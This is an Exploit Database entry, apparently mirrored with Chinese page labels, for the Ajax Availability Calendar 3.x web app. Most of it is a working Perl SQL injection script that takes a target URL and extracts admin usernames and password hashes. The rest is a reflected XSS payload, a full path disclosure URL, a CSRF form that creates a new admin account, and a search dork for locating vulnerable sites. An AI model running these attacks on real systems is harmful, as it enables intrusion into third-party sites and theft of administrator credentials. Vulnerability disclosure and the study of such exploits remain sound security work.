Ajax Availability Calendar 3.x – Multiple Vulnerabilities

• Exploit Database
• 8 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2013-05-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/25409/

• Ajax Availability Calendar 3.X.X Multiple Vulnerabilties
  ==============================================================
   
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  .:. Script : http://www.ajaxavailabilitycalendar.com/
  .:. Dork : intitle:"Ajax Availability Calendar" , inurl:"/ac-admin/index.php"
  ####################################################################
  ===[ Exploit ]===
  
  Sql Injection:
  ==============
  #!/usr/bin/perl -w
  
  # Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability
  # Author: AtT4CKxT3rR0r1ST
  # Contact : F.Hack@w.cn
  # Script: http://www.ajaxavailabilitycalendar.com/
  # Admin Panel : www.site.com/ac-admin/ 
  sub clear{
  system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
  clear();
  print "|----------------------------------------------------|\n";
  print "|'Ajax Availability Calendar 3.X.X'|\n";
  print "| Coded by : AtT4CKxT3rR0r1ST|\n";
  print "|----------------------------------------------------|\n";
  use LWP::UserAgent;
  print "\nInsert Target:";
  chomp(my $target=<STDIN>);
  print "\n[!] Exploiting Progress...\n";
  print "\n";
  #Nama Column
  $Column="group_concat(username,0x3a,password)";
  #Nama Table
  $table="bookings_admin_users";
  $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
  $host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+";
  $res = $b->request(HTTP::Request->new(GET=>$host));
  $answer = $res->content; if ($answer =~/:(.*):([0-9a-fA-F]{32})/){
  print "\n[+] Admin User : $1\n";
  }if($answer =~/([0-9a-fA-F]{32})/){
  print "\n[+] Admin Hash : $1\n";
  print "[+] Success !!\n";
  
  }
  
  
  
  else{print "[-] Unable To Get The Information...\n";
  }
  
  
  Reflected XSS:
  ==============
  
  www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script>
  
  
  Full Path Disclosure:
  ====================
  
  www.site.com/ac-includes/common.inc.php
  
  
  CSRF:
  =====
  [Add Admin]
  -------------
  
  <form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new">
  <input type="hidden" name="add[username]" value="admin"/>
  <input type="hidden" name="password" value="Palestine"/>
  <input type="hidden" name="password2" value="Palestine"/>
  </form>
  
  </body>
  </html>
  ####################################################################